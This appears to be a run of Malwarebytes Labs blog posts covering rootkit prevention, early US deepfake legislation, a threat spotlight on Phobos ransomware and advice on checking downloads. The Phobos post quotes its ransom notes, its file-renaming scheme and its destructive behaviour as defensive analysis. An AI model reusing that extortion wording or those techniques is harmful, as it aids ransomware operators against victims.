Rootkits are a type of malware designed to stay undetected on your computer. Cybercriminals use rootkits to remotely access and control your machine, burrowing deep into the system like a latched-on tick. Rootkits typically infect computers via phishing email, fooling users with a legitimate-looking email that actually contains malware, but sometimes they can be delivered through exploit kits.

This article provides an overview of the different types of rootkits and explains how you can prevent them from infecting your computer.

What is a rootkit?

Originally, a rootkit was a collection of tools that enabled administrative access to a computer or network. Today, rootkits are associated with a malicious type of software that provides root-level, privileged access to a computer while hiding its existence and actions. Hackers use rootkits to conceal themselves until they decide to execute their malicious malware.

In addition, rootkits can deactivate anti-malware and antivirus software, and badly damage user-mode applications. Attackers can also use rootkits to spy on user behavior, launch DDoS attacks, escalate privileges, and steal sensitive data.

Possible outcomes of a rootkit attack

Today, malware authors can easily purchase rootkits on the dark web and use them in their attacks. The list below explores some of the possible consequences of a rootkit attack.

Sensitive data stolen

Rootkits enable hackers to install additional malicious software that steals sensitive information, like credit card numbers, social security numbers, and user passwords, without being detected.

Malware infection

Attackers use rootkits to install malware on computers and systems without being detected. Rootkits conceal the malicious software from any existing anti-malware or antivirus, often de-activating security software without user knowledge. As a result of deactivated anti-malware and antivirus software, rootkits enable attackers to execute harmful files on infected computers.

File removal

Rootkits grant access to all operating system files and commands. Attackers using rootkits can easily delete Linux or Windows directories, registry keys, and files.

Eavesdropping

Cybercriminals leverage rootkits to exploit unsecured networks and intercept personal user information and communications, such as emails and messages exchanged via chat.

Remote control 

Hackers use rootkits to remotely access and change system configurations. Then hackers can change the open TCP ports inside firewalls or change system startup scripts. 

Types of rootkit attacks

Attackers can install different rootkit types on any system. Below, you’ll find a review of the most common rootkit attacks.

Application rootkits

Application rootkits replace legitimate files with infected rootkit files on your computer. These rootkits infect standard programs like Microsoft Office, Notepad, or Paint. Attackers can get access to your computer every time you run those programs. Antivirus programs can easily detect them since they both operate on the application layer.

Kernel rootkits

Attackers use these rootkits to change the functionality of an operating system by inserting malicious code into it. This gives them the opportunity to easily steal personal information.

Bootloader rootkits

The bootloader mechanism is responsible for loading the operating system on a computer. These rootkits replace the original bootloader with an infected one. This means that bootloader rootkits are active even before the operating system is fully loaded.

Hardware and firmware rootkits

This kind of rootkit can get access to a computer’s BIOS system or hard drives as well as routers, memory chips, and network cards.

Virtualized rootkits

Virtualized rootkits take advantage of virtual machines in order to control operating systems. They were developed by security researchers in 2006 as a proof of concept.

These rootkits create a virtual machine before the operating system loads, and then simply take over control of your computer. Virtualized rootkits operate at a higher level than operating systems, which makes them almost undetectable.

How to prevent a rootkit attack

Rootkit attacks are dangerous and harmful, but they only infect your computer if you somehow launched the malicious software that carries the rootkit. The tips below outline the basic steps you should follow to prevent rootkit infection.

Scan your systems

Scanners are software programs aimed to analyze a system to get rid of active rootkits.

Rootkit scanners are usually effective in detecting and removing application rootkits. However, they are ineffective against kernel, bootloader, or firmware attacks. Kernel level scanners can only detect malicious code when the rootkit is inactive. This means that you have to stop all system processes and boot the computer in safe mode in order to effectively scan the system.

Security experts claim that a single scanner cannot guarantee the complete security of a system, due to these limitations. Therefore, many advise using multiple scanners and rootkit removers. To fully protect yourself against rootkits attacks at the boot or firmware level, you need to backup your data, then reinstall the entire system.

Avoid phishing attempts

Phishing is a type of social engineering attack in which hackers use email to deceive users into clicking on a malicious link or downloading an infected attachment.

The fraudulent email can be anything, from Nigerian prince scams asking to reclaim gold to fake messages from Facebook requesting that you update your login credentials. The infected attachments can be Excel or Word documents, a regular executable program, or an infected image.

Update your software

Many software programs contain vulnerabilities and bugs that allow cybercriminals to exploit them—especially older, legacy software. Usually, companies release regular updates to fix these bugs and vulnerabilities. But not all vulnerabilities are made public. And once software has reached a certain age, companies stop supporting them with updates.

Ongoing software updates are essential for staying safe and preventing hackers from infecting you with malware. Keep all programs and your operating system up-to-date, and you can avoid rootkit attacks that take advantage of vulnerabilities.

Use next-gen antivirus

Malware authors always try to stay one step ahead of the cybersecurity industry. To counter their progress, you should use antivirus programs that leverage modern security techniques, like machine learning-based anomaly detection and behavioral heuristics. This type of antivirus can determine the origin of the rootkit based on its behavior, detect the malware, and block it from infecting your system.

Monitor network traffic

Network traffic monitoring techniques analyze network packets in order to identify potentially malicious network traffic. Network analytics can also mitigate threats more quickly while isolating the network segments that are under attack to prevent the attack from spreading.

Rootkit prevention beats clean-up

A rootkit is one of the most difficult types of malware to find and remove. Attackers frequently use them to remotely control your computer, eavesdrop on your network communication, or execute botnet attacks

This is a nasty type of malware that can seriously affect your computer’s performance and lead to personal data theft. Since it’s difficult to detect a rootkit attack, prevention is often the best defense. Use the tips offered in this article as a starting point for your defense strategy. To ensure continual protection, continue learning. Attacks always change, and it’s important to keep up.

The post How to prevent a rootkit attack appeared first on Malwarebytes Labs.

Rules on deepfakes take hold in the US

For years, an annual, must-pass federal spending bill has served as a vehicle for minor or contentious provisions that might otherwise falter in standalone legislation, such as the prohibition of new service member uniforms, or the indefinite detainment of individuals without trial.

In 2019, that federal spending bill, called the National Defense Authorization Act (NDAA), once again included provisions separate from the predictable allocation of Department of Defense funds. This time, the NDAA included language on deepfakes, the machine-learning technology that, with some human effort, has created fraudulent videos of UK political opponents Boris Johnson and Jeremy Corbyn endorsing one another for Prime Minister.

Matthew F. Ferraro, a senior associate at the law firm
WilmerHale who advises clients on national security, cyber security, and crisis
management, called the deepfakes provisions a “first.”

“This is the first federal legislation on deepfakes in the history
of the world,” Ferraro said about the NDAA, which was signed by the President
into law on December 20, 2019.

But rather than creating new policies or crimes regarding deepfakes—like making it illegal to develop or distribute them—the NDAA asks for a better understanding of the burgeoning technology. It asks for reports and notifications to Congress.

Per the NDAA’s new rules, the US Director of National Intelligence must, within 180 days, submit a report to Congress that provides information on the potential national security threat that deepfakes pose, along with the capabilities of foreign governments to use deepfakes in US-targeted disinformation campaigns, and what countermeasures the US currently has or plans to develop.

Further, the Director of National
Intelligence must notify Congress each time a foreign government either has, is
currently, or plans to launch a disinformation campaign using deepfakes of “machine-generated
text,” like that produced by online bots that impersonate humans.

Lee Tien, senior staff attorney for Electronic Frontier Foundation, said that, with any luck, the DNI report could help craft future, informed policy. Whether Congress will actually write any legislation based on the DNI report’s information, however, is a separate matter.

“You can lead a horse to water,” Tien said, “but you can’t necessarily make them drink.”

With the NDAA’s passage, Malwarebytes is starting a two-part blog on deepfake legislation in the United States. Next week we will explore several Congressional and stateside bills in further depth.

The National Defense Authorization Act

The National Defense Authorization Act of 2020 is a sprawling, 1,000-plus page bill that includes just two sections on deepfakes. The sections set up reports, notifications, and a deepfakes “prize” for research in the field.

According to the first section, the country’s Director of
National Intelligence must submit an unclassified report to Congress within 180
days that covers the “potential national security impacts of machine manipulated
media (commonly known as “deepfakes”); and the actual or potential use of
machine-manipulated media by foreign governments to spread disinformation or
engage in other malign activities.”

The report must include the following seven items:

  • An assessment of the technology capabilities of foreign governments concerning deepfakes and machine-generated text
  • An assessment of how foreign governments could use or are using deepfakes and machine-generated text to “harm the national security interested of the United States”
  • An updated identification of countermeasure technologies that are available, or could be made available, to the US
  • An updated identification of the offices inside the US government’s intelligence community that have, or should have, responsibility on deepfakes
  • A description of any research and development efforts carried out by the intelligence community
  • Recommendations about whether the intelligence community needs tools, including legal authorities and budget, to combat deepfakes and machine-generated text
  • Any additional info that the DNI finds appropriate

The report must be submitted in an unclassified format. However,
an annex to the report that specifically addresses the technological capabilities
of the People’s Republic of China and the Russian Federation may be classified.

The NDAA also requires that the DNI notify the Congressional
intelligence committees each time there is “credible information” that an
identifiable, foreign entity has used, will use, or is currently using deepfakes
or machine-generated text to influence a US election or domestic political
processes.

Finally, the NDAA also requires that the DNI set up what it
calls a “deepfakes prize competition,” in which a program will be established “to
award prizes competitively to stimulate the research, development, or
commercialization of technologies to automatically detect machine-manipulated
media.” The prize amount cannot exceed $5 million per year.

As the first, approved federal language on deepfakes, the NDAA is rather non-controversial, Tien said.

“Politically, there’s nothing particularly significant about
the fact that this is the first thing that we’ve seen the government enact in
any sort of way about [deepfakes and machine-generated text],” Tien said,
emphasizing that the NDAA has been used as a vehicle for other report-making
provisions for years. “It’s also not surprising that it’s just reports.”

But while the NDAA focuses only on research, other pieces of legislation—including some that have become laws in a couple of states—directly confront the assumed threat of deepfakes to both privacy and trust.

Pushing back against pornographic and political deception

Though today feared as a democracy destabilizer, deepfakes began
not with political subterfuge or international espionage, but with porn.

In 2017, a Reddit user named “deepfakes” began posting short clips of nonconsensual pornography that mapped the digital likenesses of famous actresses and celebrities onto the bodies of pornographic performers. This proved wildly popular.

In little time, a dedicated “subreddit”—a smaller, devoted forum—was created, and increasingly more deepfake pornography was developed and posted online. Two offshoot subreddits were created, too—one for deepfake “requests,” and another for fulfilling those requests. (Ugh.)

While the majority of deepfake videos feature famous actresses and
musicians, it is easy to imagine an abusive individual making and sharing a
deepfake of an ex-partner to harm and embarrass them.  

In 2018, Reddit banned the deepfake subreddits, but the creation of deepfake material surged, and in the same year, a new potential threat emerged.

Working with producers at Buzzfeed, comedian and writer Jordan Peele helped showcase the potential danger of deepfake technology when he lent his voice to a manipulated video of President Barack Obama.

“We’re entering an era in which our enemies can make anyone
say anything at any point in time, even if they would never say those things,” Peele
said, posing as President Obama.

This year, that warning gained some legitimacy, when a video of Speaker of the
House of Representatives Nancy Pelosi was slowed down to fool viewers into thinking
that the California policymaker was either drunk or impaired. Though the video
was not a deepfake because it did not rely on machine-learning technology, its impact
was clear: It was viewed by more than 2 million people on Facebook and shared
on Twitter by the US President’s personal lawyer, Rudy Giuliani.

These threats spurred lawmakers in several states to introduce legislation to prohibit anyone from developing or sharing deepfakes with the intent to harm or deceive.

On July 1, Virginia passed a law that makes the distribution of nonconsensual pornographic videos a Class 1 misdemeanor. On September 1, Texas passed a law to prohibit the making and sharing of deepfake videos with the intent to harm a political candidate running for office. In October, California Governor Gavin Newsom signed Assembly Bills 602 and 730, which, respectively, make it illegal to create and share nonconsensual deepfake pornography and to try to influence a political candidate’s run for office with a deepfake released within 60 days of an election.

Along the way, Congressional lawmakers in Washington, DC, have matched the efforts of their stateside counterparts, with one deepfake bill clearing the House of Representatives and another deepfake bill clearing the Senate.

The newfound interest from lawmakers is a good thing,
Ferraro said.

“People talk a lot about how legislatures are slow, and how
Congress is captured by interests, or its suffering ossification, but I look at
what’s going on with manipulated media, and I’m filled with some sense of hope
and satisfaction,” Ferraro said. “Both houses have reacted quickly, and I think
that should be a moment of pride.”  

But the new legislative proposals are not universally approved. Upon the initial passage of California’s AB 730, the American Civil Liberties Union urged Gov. Newsom to veto the bill.

“Despite the author’s good intentions, this bill will not solve
the problem of deceptive political videos; it will only result in voter
confusion, malicious litigation, and repression of free speech,” said Kevin
Baker, ACLU legislative director.

Another organization that opposes dramatic, quick regulation on deepfakes is EFF, which wrote earlier in the summer, that “Congress should not rush to regulate deepfakes.”

Why then, does EFF’s Tien welcome the NDAA?

Because, he said, the NDAA does not introduce substantial policy
changes, but rather proposes a first step in creating informed policy in the
future.

“From an EFF standpoint, we do want to encourage folks to actually
synthesize the existing knowledge and to get to some sort of common ground on
which people can then make policy choices,” Tien said. “We hope the [DNI report]
will be mostly available to the public, because, if the DNI actually does what
they say they’re going to do, we will learn more about what folks outside the
US are doing [on deepfakes], and both inside the US, like efforts funded by the
Department of Defense or by the intelligence community.”

Tien continued: “To me, that’s all good.”

Wait and see

The Director of National Intelligence has until June to submit
their report on deepfakes and machine-generated text. But until then, more
states, such as New York and Massachusetts, may forward deepfake bills that
were already introduced last year.

Further, as deepfakes continue to be shared online, more companies may have to grapple with how to treat them. Just last week, Facebook announced a new political deepfake policy that many argue does little to stop the wide array of disinformation posted on the platform.

Join us next week, when we take a deeper look at current Federal and statewide deepfake legislation and at the tangential problem of fraudulent, low-tech videos now referred to as “cheapfakes.”

The post Rules on deepfakes take hold in the US appeared first on Malwarebytes Labs.

Threat spotlight: Phobos ransomware lives up to its name

Ransomware has struck dead on organizations since it became a mainstream tool in cybercriminals’ belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware’s got its hooks in global businesses and shows no signs of stopping. That includes a malware family known as Phobos ransomware, named after the Greek god of fear.

Phobos is another one of those ransomware families that primarily targets organizations by employing tried-and-tested tactics to infiltrate systems. Sometimes called Phobos NextGen and Phobos NotDharma, many consider this ransomware an off-shoot or variant—if not a rip-off—of the Dharma ransomware family, which is also called CrySis. This is attributed to Phobos’ operational and technical likeness to recent Dharma strains.

Phobos ransomware, like Sodinokibi, is sold in the underground in ransomware-as-a-service (RaaS) packages. This means that criminals with little to no technical know-how can create their own ransomware strain with the help of a kit, and organize a campaign against their desired targets.

However, Coveware researchers have noted that, compared to their peers, Phobos operators are “less organized and professional,” which has eventually led to extended ransom negotiations and more complications retrieving files and systems for Phobos ransomware victims during the decryption process.

Phobos ransomware infection vectors

Phobos can arrive on systems in several ways: via open or insecure remote desktop protocol (RDP) connections on port 3389, brute-forced RDP credentials, the use of stolen and bought RDP credentials, and old-fashion phishing. Phobos operators can also leverage malicious attachments, downloads, patch exploits, and software vulnerabilities to gain access to an organization’s endpoints and network.

Phobos ransomware primarily targets businesses; however, there have been several reports of consumers finding themselves face-to-face with this adversary, too.

Symptoms of Phobos ransomware infection

ransom note

Systems affected by variants of the Phobos ransomware display the following symptoms:

Presence of ransom notes. Upon infection, Phobos drops two ransom notes in text (.TXT) and in executable web file (.HTA) format. The latter automatically opens after Phobos finishes encrypting files.

encrypted
The HTA ransom note, which was noted to be a re-branded version of Dharma’s ransom note

Here’s a snippet of the note:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email address 1]

Write this ID in the title of your message [generated ID]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

As you can see, Phobos operators are requiring victims to contact them in the event of their ransomware infection.

In some notes from other variants, instructions to reach threat actors via Jabber are not included.

Aside from pertinent channels victims can reach the threat actors, this ransom note also contains information on how they can acquire Bitcoins and how to install the messenger client.

ransom info
The TXT ransom note, which is notably shorter than its HTA counterpart. This means that non-tech savvy victims would have to resort to doing their own research to understand unfamiliar terms. Note that while this contains the email addresses also found in the HTA file, it doesn’t contain the generated ID.

!!! All of your files are encrypted !!!

To decrypt them send e-mail, to this address: [email address 1]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

After triggering the opening of the HTA ransom note, which supposedly signifies the end of Phobos’ encryption, we have observed that it is an aggressive ransomware that continues to run in the background and encode new files it is programmed to encrypt. It can do this with or without an Internet connection.

Encrypted files with a long, appended string after the extension name. Phobos encrypts target files using AES-256 with RSA-1024 asymmetric encryption. Both Phobos and Dharma implement the same RSA algorithm; however, Phobos uses it from Windows Crypto API while Dharma uses it from a third-party static library. Upon encryption, it appends a compound extension name at the end of encrypted files. This implements the format or formula:

.ID[ID][email address 1].[added extension]

In the formula, [ID] is the generated ID number specified in the ransom note. It is a two-part alpha-numeric string: the victim ID and the version ID, separated by a dash. [email address 1] is the email address victims are prescribed to use in reaching out to the threat actors. This is also specified in the ransom note. Lastly, [added extension] is an extension that Phobos threat actors decide to associate their ransomware with. Below are known extensions Phobos uses:

  • 1500dollars
  • actin
  • Acton
  • actor
  • Acuff
  • Acuna
  • acute
  • adage
  • Adair
  • Adame
  • banhu
  • banjo
  • Banks
  • Banta
  • Barak
  • bbc
  • blend
  • BORISHORSE
  • bqux
  • Caleb
  • Cales
  • Caley
  • calix
  • Calle
  • Calum
  • Calvo
  • CAPITAL
  • com
  • DDoS
  • deal
  • deuce
  • Dever
  • devil
  • Devoe
  • Devon
  • Devos
  • dewar
  • eight
  • eject
  • eking
  • Elbie
  • elbow
  • elder
  • Frendi
  • help
  • KARLOS
  • karma
  • mamba
  • phobos
  • phoenix
  • PLUT
  • WALLET
  • zax

For example, the new file name of sample.bmp after encryption is sample.bmp.id[23043C5D-2394].[agagekeys@qq.com].Caleb.

Phobos encrypts files with the following extensions:

phobos file whitelist

However, it skips encoding the following OS files and files in the C:Windows folder:

  • boot.ini
  • bootfont.bin
  • ntldr
  • ntdetect.com
  • io.sys

Phobos fully encodes files with sizes that can be classed as typical. For large files, however, it performs a different algorithm wherein it partially encrypts selected portions of such files. This is an effective method to severely cut down the time it takes to encrypt large files and, at the same time, maximize the damage it could do to such a file if something goes wrong with its decryption.

This ransomware attacks files in all local drives as well as network shares.

Terminated processes. Phobos ransomware is known to terminate the following active processes on affected systems so that no programs can stop it from accessing files to eventually encrypt:

phobos app terminate

Deleted shadow copies
and local backups.
Like Sodinokibi
and other ransomware families, Phobos deletes shadow copies and backup copies
of files to prevent users from restoring encrypted files, thus, forcing them to
do the threat actors’ bidding.

Systems not booting in recovery mode. Recovery mode is innate in Windows systems. If users encounter a technical flaw leading to the system crashing or getting corrupted, they have the option to restore the OS to its normal state by reloading its last known state before the flaw. Phobos removes this option by preventing users from entering this mode.

Disabled firewall. As we already know, malware that firewalls stop could be allowed into the affected system.

Protect your system from Phobos ransomware

Malwarebytes’ signature-less detection, coupled with real-time anti-malware and anti-ransomware technology, identifies and protects consumer and business users from Phobos ransomware in various stages of attack.

phobos detect

We recommend both consumers and IT administrators take the following actions to secure and mitigate against Phobos ransomware attacks:

  • Set your RDP server, which is built in in the Windows OS, to deny public IPs access to TCP port 3389, the default port Windows Remote Desktop listens on. If you or your organizations have no need for RDP, better to disable the service altogether. Critical systems or systems with sensitive information should not have RDP enabled.
  • Along with RDP port blocking, we also suggest the blocking of TCP port 445, the default port a Server Message Block (SMB) uses to communicate in a Windows-based LAN at the network perimeter. Note that you or your organization may have to do in-depth testing to see how your system and/or programs are impacted by this block. As a rule of thumb, block all unused ports.
  • Allow RDP access to IPs that are under you or your organization’s control.
  • Enable the logging of RDP access attempts and review them regularly to detect instances of potential intrusion.
  • Enforce the use of strong passwords and account lockout policies for Active Directory domains and local Windows accounts.
  • Enforce multi-factor authentication (MFA) to RDP and local account logons whenever possible.
  • Enforce the use of a virtual private networks (VPNs) if your organization allows employees to work remotely.
  • Come up with and implement a sound backup strategy.
  • Maintain an inventory of running services and applications on your system, and review it regularly. For critical systems, it’s best to have an active monitoring and alerting scheme in place.
  • Have a disaster recovery scheme in place in case of a successful breach via RDP happens.
  • Keep all your software, including OS and anti-malware, up-to-date.

On a final note, if you have all your personal or organization resources properly locked down and secured, and you or your organization adhere to good cyber hygiene practices, there is little to be feared about Phobos or any ransomware in general.

Indicators of Compromise (IOCs)

  • e59ffeaf7acb0c326e452fa30bb71a36
  • eb5d46bf72a013bfc7c018169eb1739b
  • fa4c9359487bbda57e0df32a40f14bcd

Have a threat-free 2020, everyone!

The post Threat spotlight: Phobos ransomware lives up to its name appeared first on Malwarebytes Labs.

A week in security (January 6 – 12)

Last week on Malwarebytes Labs, we told readers how to check the safety of websites and their related files, explored the shady behavior taking place within the billion-dollar search industry, broke down the top six ways that hackers target retail businesses, and put a spotlight on the ransomware family Phobos.

We also broke a major new story when we discovered that a government-subsidized mobile phone is being shipped with pre-installed, unremovable malware.  

Other cybersecurity news

Stay safe, everyone!

The post A week in security (January 6 – 12) appeared first on Malwarebytes Labs.

Dubious downloads: How to check if a website and its files are malicious

A significant amount of malware infections and potentially unwanted program (PUP) irritants are the result of downloads from unreliable sources. There are a multitude of websites that specialize in distributing malicious payloads by offering them up as something legitimate or by bundling the desired installer with additional programs.

In November 2019, we learned that Intel removed old drivers, BIOS updates, and other legacy software from their site. While this software relates to products released in the last century and early years of the 2000s, many users still rely on old Intel products and have been left scrambling for specific downloads.

Users that follow older links to certain drivers and updates will find this instead:

Intel Removed

Following the links to search the site or the download center only leads users around in circles—those downloads are gone. While some might argue that it is Intel’s right to remove drivers and updates after a decade, others understand that whenever legacy software is abandoned, a security nightmare ensues.

When users can no longer download files from official sources, desperate people will roam the Internet for a place where they can find the file they need. And what they usually find instead are malicious websites and downloads.

Malvertising using popular downloads

Habitually, threat actors find out which search terms are gaining in popularity as users seek out terminated software downloads and try to lure searchers to their site. They will use SEO techniques to rank high in the search results or may even spend some dollars to show up in the sponsored results for certain keywords. They can hide their malware in malvertising in the form of downloads or even drive-by-downloads, in which users needn’t install a single file, only visit the site, to be infected.

After all, a victim that is desperately looking for a file he needs to get a system up and running again is really all a malware peddler could wish for. All they have to do is make the user of the site believe they have found the file they are looking for. Once they are convinced, they will download and install the alleged driver all by themselves.

All the threat actor has to do is upload the malware under some convincing filename and attract visitors to the site. This is basically the same modus operandi that you will find in use when people go looking for cracks and keygens.

So, what can users do to avoid falling victim to such a scam? A couple of things, as it happens. We will provide you with some checks you can do before you visit the download site. And there are some checks you can perform before you run the downloaded file, too.

Checks you can perform to assess the website

When you have found a site that offers a file for download, there are a few actions you can take to check whether the site is trustworthy. They are:

  • Check for the green padlock
  • Read third-party reviews of the website
  • Use a trusted antivirus or browser extension, such as Browser Guard

Checking for the presence of the green padlock is a good start to ensure a site has purchased a security certificate, but it’s also not a guarantee that the website is safe. SSL certificates are cheap, and your neighborhood cybercriminal knows where to get them practically for free. If you click on the green padlock, you can find out who issued the certificate and for which site.


Recommended reading: Explained: security certificates


There are many websites that offer reviews of download sites and domains, and while many of these sites are reputable, they tend to fall a little bit behind in adding Internet newcomers. Our cybercriminal can afford to dump a domain like a hot potato once it has racked up too many bad reviews, then purchase a new site from which to run his scheme.

In short, you can trust reviews about sites that have been around for a while, but the lack of reviews for a site could mean they only started or they may be up to no good.

Some cybercriminals are brilliant programmers. Most are not. But all the successful ones have one skill in common: They are well-versed in tricking people. So, don’t accept a website as trustworthy just because it features logos of other trustworthy companies on its pages. Logo images are easily found in online searches, and they could be planted on the site for exactly that reason: to gain the visitors’ trust. Logos could also be stolen, unauthorized, or handed out for different reasons than you might expect.

Some browsers and some free applications warn you about shady sites—especially sites they know to be the home of malware and scammers. Malwarebytes Browser Guard, for example, can be installed on Chrome and Firefox, adding to the browsers’ own capabilities to recognize malicious domains and sites.

How do I filter possible malware from the downloaded files

There are some methods you can use to weed
out the bad boys in your download folder:

  • Compare the checksum to the original file
  • Look at the file’s digital signature
  • Run a malware scan

A checksum is a sequence of numbers and
letters used to check data for errors. If you know the checksum of the original
file, you can compare it to the one you have downloaded. Windows,
macOS, and Linux have built-in options
to calculate the checksum of a file.

The digital signature of a Windows
executable file (a file with an .exe extension) can be verified after the file
has been downloaded and saved. In your Downloads folder, right-click the
downloaded .exe file and click Properties. Here you can click on the Digital
Signatures tab to check whether the downloaded file is signed by the expected
party.

Finally, use your anti-malware scanner to double-check that you are not downloading an infected file. You can also use online scanners like VirusTotal, which will also provide you with a SHA-256 hash for the file and save you the trouble of calculating a checksum.

virustotalscan

Much ado about what?

All this may seem like a lot of work to those who habitually download files without a worry in the world. However, even the most practiced downloader eventually has their moment of truth—when that downloaded file wrecks their computer or all those bundled applications are harder to remove than expected.

People who download all the time have better instincts about which sites to trust or not, but that doesn’t mean they can’t be fooled. From experience, they know the sites that offer malware under a different filename from the sites that offer clean files. But sometimes, we reach for the shiny golden delicious and, once we take a bite, discover it has a worm.

We don’t all have the stomach or the knowledge to clean an infected computer. And some systems are not ours to put at risk.

Even if you follow all these pointers to the letter, it is still riskier to download files from unknown sites than it is to download from the company that made them. So we would like to urge companies to keep their “old files” available on their own site, even if the number of downloads has dwindled.

Stay safe, everyone!

The post Dubious downloads: How to check if a website and its files are malicious appeared first on Malwarebytes Labs.